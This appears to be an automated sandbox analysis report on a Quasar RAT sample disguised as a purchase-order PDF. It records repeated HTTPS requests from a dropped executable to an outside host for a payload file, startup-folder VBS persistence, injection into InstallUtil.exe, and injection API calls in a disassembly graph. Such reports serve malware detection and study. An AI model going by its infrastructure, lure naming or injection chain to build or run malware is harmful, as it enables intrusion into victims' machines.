                                                        2024-11-21 11:58:45 UTC315INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        91192.168.2.650162167.250.5.914436236C:\Users\user\AppData\Roaming\Directory.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-11-21 11:58:47 UTC69OUTGET /rindasq/Mktxz.vdf HTTP/1.1
                                                        Host: sierrassinfinusadas.com.ar
                                                        2024-11-21 11:58:48 UTC163INHTTP/1.1 404 Not Found
                                                        Server: nginx
                                                        Date: Thu, 21 Nov 2024 11:58:48 GMT
                                                        Content-Type: text/html; charset=iso-8859-1
                                                        Content-Length: 315
                                                        Connection: close
                                                        2024-11-21 11:58:48 UTC315INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        92192.168.2.650166167.250.5.914436236C:\Users\user\AppData\Roaming\Directory.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-11-21 11:58:51 UTC69OUTGET /rindasq/Mktxz.vdf HTTP/1.1
                                                        Host: sierrassinfinusadas.com.ar
                                                        2024-11-21 11:58:52 UTC163INHTTP/1.1 404 Not Found
                                                        Server: nginx
                                                        Date: Thu, 21 Nov 2024 11:58:52 GMT
                                                        Content-Type: text/html; charset=iso-8859-1
                                                        Content-Length: 315
                                                        Connection: close
                                                        2024-11-21 11:58:52 UTC315INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        93192.168.2.650171167.250.5.914436236C:\Users\user\AppData\Roaming\Directory.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-11-21 11:58:55 UTC69OUTGET /rindasq/Mktxz.vdf HTTP/1.1
                                                        Host: sierrassinfinusadas.com.ar
                                                        2024-11-21 11:58:55 UTC163INHTTP/1.1 404 Not Found
                                                        Server: nginx
                                                        Date: Thu, 21 Nov 2024 11:58:55 GMT
                                                        Content-Type: text/html; charset=iso-8859-1
                                                        Content-Length: 315
                                                        Connection: close
                                                        2024-11-21 11:58:55 UTC315INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        94192.168.2.650173167.250.5.914436236C:\Users\user\AppData\Roaming\Directory.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-11-21 11:58:57 UTC69OUTGET /rindasq/Mktxz.vdf HTTP/1.1
                                                        Host: sierrassinfinusadas.com.ar
                                                        2024-11-21 11:58:57 UTC163INHTTP/1.1 404 Not Found
                                                        Server: nginx
                                                        Date: Thu, 21 Nov 2024 11:58:57 GMT
                                                        Content-Type: text/html; charset=iso-8859-1
                                                        Content-Length: 315
                                                        Connection: close
                                                        2024-11-21 11:58:57 UTC315INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        95192.168.2.650175167.250.5.914436236C:\Users\user\AppData\Roaming\Directory.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-11-21 11:58:59 UTC69OUTGET /rindasq/Mktxz.vdf HTTP/1.1
                                                        Host: sierrassinfinusadas.com.ar
                                                        2024-11-21 11:59:00 UTC163INHTTP/1.1 404 Not Found
                                                        Server: nginx
                                                        Date: Thu, 21 Nov 2024 11:58:59 GMT
                                                        Content-Type: text/html; charset=iso-8859-1
                                                        Content-Length: 315
                                                        Connection: close
                                                        2024-11-21 11:59:00 UTC315INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        96192.168.2.650177167.250.5.914436236C:\Users\user\AppData\Roaming\Directory.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-11-21 11:59:01 UTC69OUTGET /rindasq/Mktxz.vdf HTTP/1.1
                                                        Host: sierrassinfinusadas.com.ar
                                                        2024-11-21 11:59:02 UTC163INHTTP/1.1 404 Not Found
                                                        Server: nginx
                                                        Date: Thu, 21 Nov 2024 11:59:02 GMT
                                                        Content-Type: text/html; charset=iso-8859-1
                                                        Content-Length: 315
                                                        Connection: close
                                                        2024-11-21 11:59:02 UTC315INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        97192.168.2.650179167.250.5.91443
                                                        TimestampBytes transferredDirectionData
                                                        2024-11-21 11:59:06 UTC69OUTGET /rindasq/Mktxz.vdf HTTP/1.1
                                                        Host: sierrassinfinusadas.com.ar
                                                        2024-11-21 11:59:06 UTC163INHTTP/1.1 404 Not Found
                                                        Server: nginx
                                                        Date: Thu, 21 Nov 2024 11:59:06 GMT
                                                        Content-Type: text/html; charset=iso-8859-1
                                                        Content-Length: 315
                                                        Connection: close
                                                        2024-11-21 11:59:06 UTC315INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        98192.168.2.650180167.250.5.91443
                                                        TimestampBytes transferredDirectionData
                                                        2024-11-21 11:59:08 UTC69OUTGET /rindasq/Mktxz.vdf HTTP/1.1
                                                        Host: sierrassinfinusadas.com.ar
                                                        2024-11-21 11:59:09 UTC163INHTTP/1.1 404 Not Found
                                                        Server: nginx
                                                        Date: Thu, 21 Nov 2024 11:59:08 GMT
                                                        Content-Type: text/html; charset=iso-8859-1
                                                        Content-Length: 315
                                                        Connection: close
                                                        2024-11-21 11:59:09 UTC315INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        99192.168.2.650182167.250.5.91443
                                                        TimestampBytes transferredDirectionData
                                                        2024-11-21 11:59:10 UTC69OUTGET /rindasq/Mktxz.vdf HTTP/1.1
                                                        Host: sierrassinfinusadas.com.ar
                                                        2024-11-21 11:59:11 UTC163INHTTP/1.1 404 Not Found
                                                        Server: nginx
                                                        Date: Thu, 21 Nov 2024 11:59:10 GMT
                                                        Content-Type: text/html; charset=iso-8859-1
                                                        Content-Length: 315
                                                        Connection: close
                                                        2024-11-21 11:59:11 UTC315INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        100192.168.2.650183167.250.5.91443
                                                        TimestampBytes transferredDirectionData
                                                        2024-11-21 11:59:12 UTC69OUTGET /rindasq/Mktxz.vdf HTTP/1.1
                                                        Host: sierrassinfinusadas.com.ar
                                                        2024-11-21 11:59:13 UTC163INHTTP/1.1 404 Not Found
                                                        Server: nginx
                                                        Date: Thu, 21 Nov 2024 11:59:13 GMT
                                                        Content-Type: text/html; charset=iso-8859-1
                                                        Content-Length: 315
                                                        Connection: close
                                                        2024-11-21 11:59:13 UTC315INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


                                                        Statistics

                                                        CPU Usage

                                                        Click to jump to process

                                                        Memory Usage

                                                        Click to jump to process

                                                        High Level Behavior Distribution

                                                        Click to dive into process behavior distribution

                                                        Behavior

                                                        Click to jump to process

                                                        System Behavior

                                                        General

                                                        Target ID:0
                                                        Start time:06:54:54
                                                        Start date:21/11/2024
                                                        Path:C:\Users\user\Desktop\PO#83298373729383838392387373873PDF.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Users\user\Desktop\PO#83298373729383838392387373873PDF.exe"
                                                        Imagebase:0x6d0000
                                                        File size:80'896 bytes
                                                        MD5 hash:7C53C51719C6402A25A4FACD1E62D01E
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.2200782194.0000000002C1A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 00000000.00000002.2200782194.0000000002DE7000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.2240298776.0000000006CF0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.2227430823.000000000419B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 00000000.00000002.2241711429.00000000079E2000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 00000000.00000002.2227430823.0000000003B78000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        Reputation:low
                                                        Has exited:true

                                                        General

                                                        Target ID:2
                                                        Start time:06:55:02
                                                        Start date:21/11/2024
                                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                                                        Imagebase:0x3f0000
                                                        File size:42'064 bytes
                                                        MD5 hash:5D4073B2EB6D217C19F2B22F21BF8D57
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 00000002.00000002.4584532065.0000000000AE0000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 00000002.00000002.4592317023.0000000002AA1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 00000002.00000002.4584532065.00000000007C2000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                        Reputation:moderate
                                                        Has exited:false

                                                        General

                                                        Target ID:4
                                                        Start time:06:55:12
                                                        Start date:21/11/2024
                                                        Path:C:\Windows\System32\wscript.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Directory.vbs"
                                                        Imagebase:0x7ff66e660000
                                                        File size:170'496 bytes
                                                        MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        General

                                                        Target ID:5
                                                        Start time:06:55:12
                                                        Start date:21/11/2024
                                                        Path:C:\Users\user\AppData\Roaming\Directory.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Users\user\AppData\Roaming\Directory.exe"
                                                        Imagebase:0x760000
                                                        File size:80'896 bytes
                                                        MD5 hash:7C53C51719C6402A25A4FACD1E62D01E
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Antivirus matches:
                                                        • Detection: 100%, Joe Sandbox ML
                                                        • Detection: 24%, ReversingLabs
                                                        Reputation:low
                                                        Has exited:false

                                                        Disassembly

                                                        Reset < >

                                                          Execution Graph

                                                          Execution Coverage:6.7%
                                                          Dynamic/Decrypted Code Coverage:100%
                                                          Signature Coverage:27.5%
                                                          Total number of Nodes:40
                                                          Total number of Limit Nodes:1
                                                          execution_graph 18556 29d35d8 18557 29d3595 NtProtectVirtualMemory 18556->18557 18559 29d35db 18556->18559 18558 29d35a8 18557->18558 18573 29d57b8 18574 29d5800 NtResumeThread 18573->18574 18576 29d5835 18574->18576 18577 29d48a8 18578 29d48bd 18577->18578 18580 29d4788 Wow64SetThreadContext 18578->18580 18581 29d4790 Wow64SetThreadContext 18578->18581 18579 29d48d6 18580->18579 18581->18579 18582 29d4ee8 18583 29d4efd 18582->18583 18587 29d4de8 18583->18587 18591 29d4de0 18583->18591 18584 29d4f1f 18588 29d4e28 VirtualAllocEx 18587->18588 18590 29d4e65 18588->18590 18590->18584 18592 29d4e28 VirtualAllocEx 18591->18592 18594 29d4e65 18592->18594 18594->18584 18595 29d50e8 18596 29d5130 WriteProcessMemory 18595->18596 18598 29d5187 18596->18598 18560 29d55c0 18561 29d55d5 18560->18561 18565 29d4788 18561->18565 18569 29d4790 18561->18569 18562 29d55ee 18566 29d47d5 Wow64SetThreadContext 18565->18566 18568 29d481d 18566->18568 18568->18562 18570 29d47d5 Wow64SetThreadContext 18569->18570 18572 29d481d 18570->18572 18572->18562 18599 29d3e20 18600 29d3e37 18599->18600 18601 29d3e4a 18600->18601 18603 29d3f74 18600->18603 18604 29d3ea6 18603->18604 18605 29d3f77 CreateProcessA 18603->18605 18604->18601 18607 29d416c 18605->18607

                                                          Executed Functions

                                                          Function 029D0040 Relevance: 1.9, Strings: 1, Instructions: 615COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 0 29d0040-29d0061 1 29d0068-29d00f2 0->1 2 29d0063 0->2 89 29d00f8 call 29d0b99 1->89 90 29d00f8 call 29d0ba8 1->90 2->1 7 29d00fe-29d013b 9 29d013d-29d0148 7->9 10 29d014a 7->10 11 29d0154-29d026f 9->11 10->11 22 29d0281-29d02ac 11->22 23 29d0271-29d0277 11->23 24 29d0a78-29d0a94 22->24 23->22 25 29d0a9a-29d0ab5 24->25 26 29d02b1-29d0414 24->26 36 29d0426-29d05bb 26->36 37 29d0416-29d041c 26->37 47 29d05bd-29d05c1 36->47 48 29d0620-29d062a 36->48 37->36 50 29d05c9-29d061b 47->50 51 29d05c3-29d05c4 47->51 49 29d0851-29d0870 48->49 52 29d062f-29d0775 49->52 53 29d0876-29d08a0 49->53 54 29d08f6-29d0961 50->54 51->54 82 29d077b-29d0847 52->82 83 29d084a-29d084b 52->83 60 29d08f3-29d08f4 53->60 61 29d08a2-29d08f0 53->61 70 29d0973-29d09be 54->70 71 29d0963-29d0969 54->71 60->54 61->60 72 29d0a5d-29d0a75 70->72 73 29d09c4-29d0a5c 70->73 71->70 72->24 73->72 82->83 83->49 89->7 90->7
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2200689200.00000000029D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029D0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
